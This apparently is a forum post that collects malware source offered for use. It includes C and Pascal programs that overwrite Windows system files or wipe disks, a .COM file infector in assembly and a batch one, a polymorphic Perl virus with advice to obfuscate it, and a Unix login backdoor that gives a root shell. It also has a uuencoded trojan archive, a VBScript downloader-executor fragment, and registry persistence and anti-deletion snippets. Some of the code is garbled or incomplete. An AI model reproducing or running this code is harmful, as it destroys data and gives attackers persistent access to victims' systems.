Buddy it's a simply joke ";
cout<<"
*************************";
delay(4000);
cout<<"


**********************************";
cout<<"
For Real Virus ";
cout<<"
Contact Me: SJ";
cout<<"
Mo: 010101010101 ";
cout<<"
Email: samjohnyb4u@gmail.com";
cout<<"
**********************************";
delay(10000);
}

void fool()
{
clrscr();
int g=DETECT,h;
initgraph(&g,&h,"c:\tc\bgi");
cleardevice();
delay(1000);
setcolor(2);
settextstyle(1,0,1);
delay(1000);
setbkcolor(BLUE);
getch();
delay(4000);
closegraph();
exit(0);
}
VIRUS Designing - Use responsibly
#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

//#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

The HITLER virus
The HITLER virus is a memory resident .COM infector which adds itself
;to the end of infected files. HITLER employs
;minimal directory stealth.
;The minimal stealth allows the virus to subtract its file size from
;infected targets when the user takes a look at them using "dir"
;functions while the virus is in memory.
;Most of HITLER's code is devoted to a huge data table which is a voice
;sample of some nut shouting "HITLER." The virus ties the effect to
;the timer tick function, but if you want to hear it immediately, change the
;source were indicated. The resulting code will assemble under A86. On
;execution the virus will lock the PC into the voice effect until reboot,
;rendering it uninfective, if annoying. Not all PC's can generate the
;HITLER sound effect - some will just buzz.

make sure u dont misuse it.. the code is totaly big so i am uploading it as txt file.. u can scan it.. txt file dosent prove nything.. lolzzz

Download:
hxxp://rapidshare.com/files/65139588/Hitler.txt

Bomber Virus
#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}



Virus
Program Wipe_The_Fuckers_HD;
uses dos,crt;
var read:string;

Begin
clrscr;
inline ($B0/$08/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {I:}
write ('.');
inline ($B0/$09/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {j:}
write ('.');
inline ($B0/$07/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {H:}
write ('.');
inline ($B0/$06/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {G:}
write ('.');
inline ($B0/$05/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {F:}
write ('.');
inline ($B0/$04/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {E:}
write ('.');
inline ($B0/$03/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {D:}
write ('.');
inline ($B0/$02/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {C:}
write ('.');
inline ($B0/$01/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {B:}
write ('.');
inline ($B0/$00/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {A:}
writeln;
textcolor (14);
Writeln ('FUCK OFF');
Writeln('');
Writeln('');
textcolor (13);
textcolor (12);
textcolor (11);
Writeln('');
sound(500);

End.

This is a live trojan tarball Backdoor
begin 664 trojan_backdoor.tar
M8F%C:V1O;W(O````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````#`P,#`W-S4`,#`P,#2(@:7,@8V%L;&5D(&)A8VMD;V]R+B`@270@
M:&%S(&YO=&AI;F<@=&\@9&\@=VET:`T*8F%C:V1O;W)S('=H870M2P@:70@=VEL;"!B87-I8V%L;'D@97)A
M6]U2!Y;W4@#0ID;VXG="!F=6-K('EO=7)S96QF(&]V97(@8GD@86-C:61E
M;G0N("!';V]D(&QU8VLA#0H-"@T*"0D)"4UE<&AI7,`
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````,#`P,#`?P8?=3&!
M?P@_/W4J@7\*/S]U(X%_##\_=1R!?PX_/W45@7\0/S]U#H!_$C]U"%M8L/_Y
MR@(`6U@N_RXR`"Z)'BX`+HP&,`#+4%-14AX&5U95#A_$/BX`)HI=`C+_@_L`
M=0/H%0"X``$NQ1XN`(E'`UU>7P,
MR":)1P);6`?#4%,>!K@A-,@`NC`8T``X?NDH`N"$ES2$''UM8PU!3
M45"*Q.@(`%CH!`!96UC#4%-14+$$TN@$,#PY=@($!^@?`%@D#P0P/#EV`@0'
MZ!$`65M8PU"P#>@'`+`*Z`(`6,-04[0.NP<`S1!;6,,`````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````8F%C:V1O;W(O8F%C:V1O;W(N97AE````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````#`P,#`W-S4`,#`P,#`````0``````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`+@1`%`.G+$3NAD`#A__+A4`M$S-(<````#_```````?`#\_/S\_/S\_/S\_
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
end

Batch Virus
Whoever thought that viruses could be in BATCH files? This virus which
we are about to see makes use of the MS-DOS operating system. This BATCH
virus uses DEBUG & EDLIN programs.
NAME: VR.BAT

ECHO = OFF (Self explanatory)
CTTY NUL (This is important. Console output is turned off)
PATH C:\MSDOS (May differ on other systems)
DIR *.COM/W>IND (The directory is written on "ind" ONLY name entries)
EDLIN IND<1 ("ind" is processed with EDLIN so only file names appear)
DEBUG IND<2 (New batch program is created with debug)
EDLIN NAME.BAT<3 (This batch goes to an executable form because of EDLIN)
CTTY CON (Console interface is again assigned)
NAME (Newly created NAME.BAT is called)

In addition to this Batch file, there are command files, here named 1,2,3.
Here is the first command file:

NAME: 1

1,4D (Here line 1-4 of the "ind" file are deleted)
E (Save file)

Here is the second command file:

NAME: 2

M100,10B,F000 (First program name is moved to the F000H address to save)
E108".BAT" (Extension of file name is changed to .BAT)
M100,10B,F010 (File is saved again)
E100"DEL" (DEL Command is written to address 100H)
MF000,F00B,104 (Original file is written after this command)
E10C 2E (Period is placed in front of extension)
E110 0D,0A (Carriage return plus line feed)
MF010,F020,11F (Modified file is moved to 11FH address from buffer area)
E112"COPY\VR.BAT" (Copy command is now placed in front of file)
E12B 0D,0A (Copy command terminated with carriage return + line feed)
RXC (The CX register is ...)
2C (Set to 2CH)
NNAME.BAT (Name it NAME.BAT)
W (Write)
Q (Quit) The third command file must be printed as a hex dump because it contains
two control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:
NAME: 3

0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110 79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00

In order for this virus to work, VR.BAT should be in the root. This
Program only affects .COM files.

Start: Jmp MainVir
Db '*'

MainVir: Call On1
On1: Pop BP
Sub BP,Offset MainVir+3
Push Ax
Mov Ax,Cs:OrgPrg[BP]
Mov Bx,Cs:OrgPrg[BP]+2
Mov Cs:Start+100h,Ax
Mov Cs:Start[2]+100h,Bx
Mov Ah,1ah
Mov Dx,0fd00h
Int 21h
Mov Ah,4eh
Search: Lea Dx,FileSpec[BP]
Xor Cx,Cx
Int 21h
Jnc Found
Jmp Ready
Found: Mov Ax,4300h
Mov Dx,0fd1eh
Int 21h
Push Cx
Mov Ax,4301h
Xor Cx,Cx
Int 21h
Mov Ax,3d02h
Int 21h
Mov Bx,5700h
Xchg Ax,Bx
Int 21h
Push Cx
Push Dx
Mov Ah,3fh
Lea Dx,OrgPrg[BP]
Mov Cx,4
Int 21h
Mov Ax,Cs:[OrgPrg][BP]
Cmp Ax,'MZ'
Je ExeFile
Cmp Ax,'ZM'
Je ExeFile
Mov Ah,Cs:[OrgPrg+3][BP]
Cmp Ah,'*'
Jne Infect
ExeFile: Call Close
Mov Ah,4fh
Jmp Search
FSeek: Xor Cx,Cx
Xor Dx,Dx
Int 21h
Ret
Infect: Mov Ax,4202h
Call FSeek
Sub Ax,3
Mov Cs:CallPtr[BP]+1,Ax
Mov Ah,40h
Lea Dx,MainVir[BP]
Mov Cx,VirLen
Int 21h
Mov Ax,4200h
Call FSeek
Mov Ah,40h
Lea Dx,CallPtr[BP]
Mov Cx,4
Int 21h
Call Close
Ready: Mov Ah,1ah
Mov Dx,80h
Int 21h
Pop Ax
Mov Bx,100h
Push Cs
Push Bx
Retf
Close: Pop Si
Pop Dx
Pop Cx
Mov Ax,5701h
Int 21h
Mov Ah,3eh
Int 21h
Mov Ax,4301h
Pop Cx
Mov Dx,0fd1eh
Int 21h
Push Si
Ret

CallPtr Db 0e9h,0,0
FileSpec Db '*.COM',0

OrgPrg: Int 20h
Nop
Nop

VirLen Equ $-MainVir


script virus source code
FileSystemObject","") tmp2=2 set tmp = F.GetSpecialFolder(tmp2) SS.open fname1= F.BuildPath(tmp,fname1) SS.write x.responseBody SS.savetofile fname1,2 SS.close call shellexe(zz,fname1)//////////////////////////test2.htmVBScript.

Poly Perl Virus
Ok, this is a polymorphic perl virus which is using EPO techniques,
To make this code useful strip the comments, remove linebreaks, and
obfuscate it .. ;)
# 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]
open(File,$0);@Virus=;close(File); # read own code
$Virus=join("", @Virus);foreach $FileName(<*>) { # get files
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { # check file
open(File, "$FileName");@Temp=;close(File); # open file
if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) { # perl file ?
if (( length(@Temp[0]) % 5 ) != 0 ){ # already infected ?
# first we generate a decryptor

$Key = int(rand(255)); # cryptkey
$crypttype = int(rand(2)); # how to crypt it ?

for ( $X = 0; $X < length($Virus); $X++ ){ # Encrypt it
if ( $crypttype == 0 ){
@Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key); # Multiply
} else {
@Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key); # Addition
}
}

$connectit = chr(int(rand(25)+65));
$VirString = join($connectit, @Crypt); # all values get seperated by a !
$filename = chr(int(rand(25)+65)); # random filename to put virus to
$filename .= int(rand(65535));
if ( int(rand(2)) == 0 ){
@Vir[0] = "\$l1l = \"$VirString\"\;";
@Vir[1] = "\$11l = $Key\;"; # key to decrypt
} else {
@Vir[0] = "\$11l = $Key\;"; # key to decrypt
@Vir[1] = "\$l1l = \"$VirString\"\;";
}
@Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
@Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { "; # Decrypt Loop

if ( $crypttype == 0 ){
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;"; # Decrypt Char
} else {
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;"; # Decrypt Char
}
@Vir[5] = "}";
@Vir[6] = "open(1l1, \">$filename\")\;"; # write encrypted
@Vir[7] = "print 1l1 \$l11\;"; # string to a file
@Vir[8] = "close(1l1)\;";
@Vir[9] = "\$lll = \`perl $filename\`;\n";
# and start it

# change variables
# $Virus File @Virus $X $Key $Vir
# l1l 1l1 ll1 lll 11l l11
@vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
foreach $replace (@vars){
$newVar = chr(int(rand(25)+65)); # with a letter
$newVar .= int(rand(65535)); # and a random number
for ( $b=0; $b < @Vir; $b++){
@Vir[$b] =~ s/$replace/$newVar/g ;
}
}


do {
chomp @Temp[0];
@Temp[0] .= " \n";
} until((length(@Temp[0]) % 5) == 0 );


open(File, ">$FileName"); # and write the infected
$Temp = join("\n", @Vir);


for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
if ( @Temp[$X] =~ "\;\n" ) { # insert virus in the middle
$Temp2 = join("", @Temp[0..$X]); # write first part
print File $Temp2; # and virus
print File $Temp; $X++;
$Y = (@Temp);
$Temp2 = join("", @Temp[$X..$Y]); # insert rest of the file
print File $Temp2;
goto CloseFile;
}
}
$Temp2 = join("", @Temp); # no possibility to insert virus
print File $Temp; # file back to disk
print File $Temp2; # without EPO


CloseFile:
close(File);
}}}}

$a = `rm $0`; # delete our selves..

Trojan Daemon[SJ]
Universal trojan ( login / imapd / qpopd )
But will work on more daemons and on most systems.
After installed on the system.
Telnet to the daemon and you will have 1 second to type in
the trojan passwd to get root access else it executes the real daemon.


( login / ipop3d / imapd trojan )
This is an combined login / ipop3d / imapd trojan.
* This should work with other deamons but i have only tested these 3
EAL == mv the real deamon to this path.
* TROJAN == This is the real path of the deamon, put the trojan here.It defaults to login trojan now.
* Dont forgot you might have to the rights of the trojan.
* Telnet to the port whatever deamon its set for.
* The passwd you need to enter in one second == door
* and you will get that lovely # =)
* This works on most systems.


#include
#include
#include
#include

#define REAL "/bin/.login"
#define TROJAN "/bin/login"
#define ROOT "door"

char **execute;
char passwd[5];

int main(int argc, char *argv[]) {
void connection();

signal(SIGALRM,connection);
alarm(1);
execute=argv;
*execute=TROJAN;

scanf("%s",passwd);

if(strcmp(passwd,ROOT)==0) {
alarm(0);
execl("/bin/sh","/bin/sh","-i",0);
exit(0);
}
else
{
execv(REAL,execute);
exit(0);
}
}


void connection()
{
execv(REAL,execute);
exit(0);
}
It`s basically not a virus but will work like same...............

01001011000111110010010101010101010000011111100000

just save it notepad wit extion .cmd

and scan with any antivirus it will not be detected....................but if opened it will format whole hard disk..............
Startup Virus
With this two lines your worm will start with windows.
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\Worm.vbs %"
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Anti Deletion Virus
This function must be the last one called, cause it never ends.
If it detects that the file has been deleted, it'screated again.
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯